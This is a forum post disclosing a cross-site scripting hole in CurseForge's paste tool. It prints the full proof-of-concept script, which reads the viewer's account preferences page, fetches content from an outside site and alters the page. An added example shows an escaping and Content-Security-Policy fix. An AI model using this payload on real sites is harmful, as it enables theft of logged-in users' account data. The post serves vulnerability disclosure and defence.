
    posted a message on Security issue via paste functionality

    Currently the paste functionality under https://authors.curseforge.com/paste is broken. It allows for XSS without any limitations, as far as I can see. Proof (does nothing harmful): https://authors.curseforge.com/paste/19c967e3

     

    The code does:

    • make an XHR to an arbitrary website and output the result
    • make an XHR to Curse itself and output your Curse join date
    • change the DOM a bit

    Consequences are:

    • You can probably delete projects (and user accounts?)
    • You can read everything available on curseforge and pass it to some other website and save it
    • ...

     

    It's difficult to post the code even here on this forum; it could be vulnerable, too:

     

    <script>
    	$(function() {
    		$('body').append($('<div style="padding: 8px; position: absolute; left: 100px; top: 100px; z-index: 1000222222220; background-color: #f4f4f4; color: #444444; border: 1px solid #cdcdcd; width: 500px; height: 200px;" id="proof"><strong>Data fetched from foreign website:</strong><div id="foreign"></div><br><br><strong>Data fetched from Curse (your join date):</strong> <div id="curse"></div></div>'));
    
    		// DOM manipulation
    		$('.primary-header-wrapper').parent().remove();
    
    		$.get('https://levelupgilde.de/js/requests/getSquad.php', function(data) {
    			$('#foreign').html(data);
    		});
    
    		$.get('https://authors.curseforge.com/account/preferences', function(data) {
    			let str = $(data).find('span.tip').html();
    			$('#curse').html(str);
    		});
    
    		$(document).keyup(function(e) {
    			if(e.key === 'Escape') {
    				$('#proof').fadeOut();
    			}
    		});
    	});
    </script>
    Posted in: General Discussion
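
An added example, not part of the original post and not CurseForge code: one way a paste viewer can return stored text so that markup like the script above is displayed instead of executed. It assumes the viewer builds the HTML on the server; `escapeHtml`, `renderPaste` and `containsRawTag` are hypothetical names, and the sample paste is a shortened, constructed form of the one in the post.

```javascript
// Characters that let pasted text break out of an HTML text or attribute context.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Build the response for viewing a paste (hypothetical handler).
// The body is escaped, and the headers limit what the page could do
// even if an escaping bug slipped through somewhere else.
function renderPaste(title, body) {
  const html =
    '<!doctype html><html><head><meta charset="utf-8"><title>' + escapeHtml(title) +
    '</title></head><body><pre>' + escapeHtml(body) + '</pre></body></html>';
  return {
    status: 200,
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      // default-src 'none' covers script-src and connect-src: no script
      // execution and no XHR targets, the two things the posted proof relies on.
      'Content-Security-Policy': "default-src 'none'; style-src 'self'; frame-ancestors 'none'",
      'X-Content-Type-Options': 'nosniff',
    },
    body: html,
  };
}

// Constructed sample: shortened form of the paste shown in the post.
const samplePaste =
  "<script>\n$(function() {\n" +
  "  $.get('https://authors.curseforge.com/account/preferences', function(data) {\n" +
  "    $('#curse').html($(data).find('span.tip').html());\n  });\n});\n</script>";

// After escaping, the <pre> element must not contain a single raw '<'.
function containsRawTag(html) {
  const inner = html.slice(html.indexOf('<pre>') + 5, html.lastIndexOf('</pre>'));
  return inner.includes('<');
}

const response = renderPaste('paste 19c967e3', samplePaste);
console.log('raw tag in rendered paste:', containsRawTag(response.body));
console.log(response.headers['Content-Security-Policy']);
```

Serving pastes from a separate origin that carries no session cookies would additionally keep any script that does run away from account pages.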